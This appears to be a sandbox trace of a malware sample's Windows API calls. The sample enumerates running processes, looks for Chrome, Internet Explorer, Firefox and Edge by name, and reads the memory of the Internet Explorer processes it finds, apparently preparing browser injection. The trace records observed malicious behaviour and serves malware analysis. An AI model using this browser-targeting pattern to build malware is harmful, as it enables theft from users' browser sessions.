	[0202.655] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.655] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0202.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.656] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.656] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0202.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x234c
	[0202.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.657] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0202.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.657] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.657] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0202.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.658] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.658] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0202.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2350
	[0202.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.659] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0202.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.659] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.660] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0202.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.660] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.661] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0202.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2354
	[0202.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.661] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0202.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.662] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.662] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0202.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.662] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.662] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0202.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2358
	[0202.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.663] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0202.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.664] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.664] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0202.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.664] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.665] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0202.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x235c
	[0202.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.666] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0202.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.666] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.666] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0202.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.667] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.667] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0202.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2360
	[0202.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.668] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0202.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.668] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.668] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0202.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.669] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0202.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2364
	[0202.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.670] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0202.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.670] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.670] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0202.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.670] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.671] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0202.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2368
	[0202.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.671] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0202.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.672] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.672] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0202.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.673] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.673] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0202.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x236c
	[0202.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.674] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0202.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.674] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.675] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0202.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.676] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.679] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0202.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2370
	[0202.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.680] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0202.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.680] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.681] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0202.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.681] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.681] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0202.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2374
	[0202.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.682] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0202.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.683] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.683] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0202.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.684] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.685] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0202.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2378
	[0202.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.685] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0202.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.686] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.686] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0202.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.687] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.687] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x237c
	[0202.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.688] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.688] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.688] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.689] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.689] NtQueryInformationProcess (in: ProcessHandle=0x237c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.689] ReadProcessMemory (in: hProcess=0x237c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.689] ReadProcessMemory (in: hProcess=0x237c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.689] ReadProcessMemory (in: hProcess=0x237c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.689] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.689] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0202.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2380
	[0202.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.690] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0202.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.690] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0202.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.691] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0202.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.691] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.691] NtQueryInformationProcess (in: ProcessHandle=0x2380, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0202.691] ReadProcessMemory (in: hProcess=0x2380, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0202.691] ReadProcessMemory (in: hProcess=0x2380, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0202.691] ReadProcessMemory (in: hProcess=0x2380, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0202.691] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0202.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2384
	[0202.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.692] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.693] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.693] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.693] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.694] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0202.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2388
	[0202.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.694] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0202.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.695] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.695] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0202.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.695] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.696] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x238c
	[0202.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.696] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.697] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.697] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.697] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2390
	[0202.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.699] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.699] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.700] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.700] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0202.701] CloseHandle (hObject=0x188) returned 1
	[0202.701] Sleep (dwMilliseconds=0x64) 
	[0202.815] GetCurrentProcessId () returned 0x110
	[0202.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0202.817] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0202.818] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0202.819] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0202.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2394
	[0202.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.820] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.820] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.820] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.820] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.820] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2398
	[0202.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.821] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.822] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.822] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.822] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.822] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0202.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x239c
	[0202.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.823] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0202.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.823] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.824] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0202.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.824] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
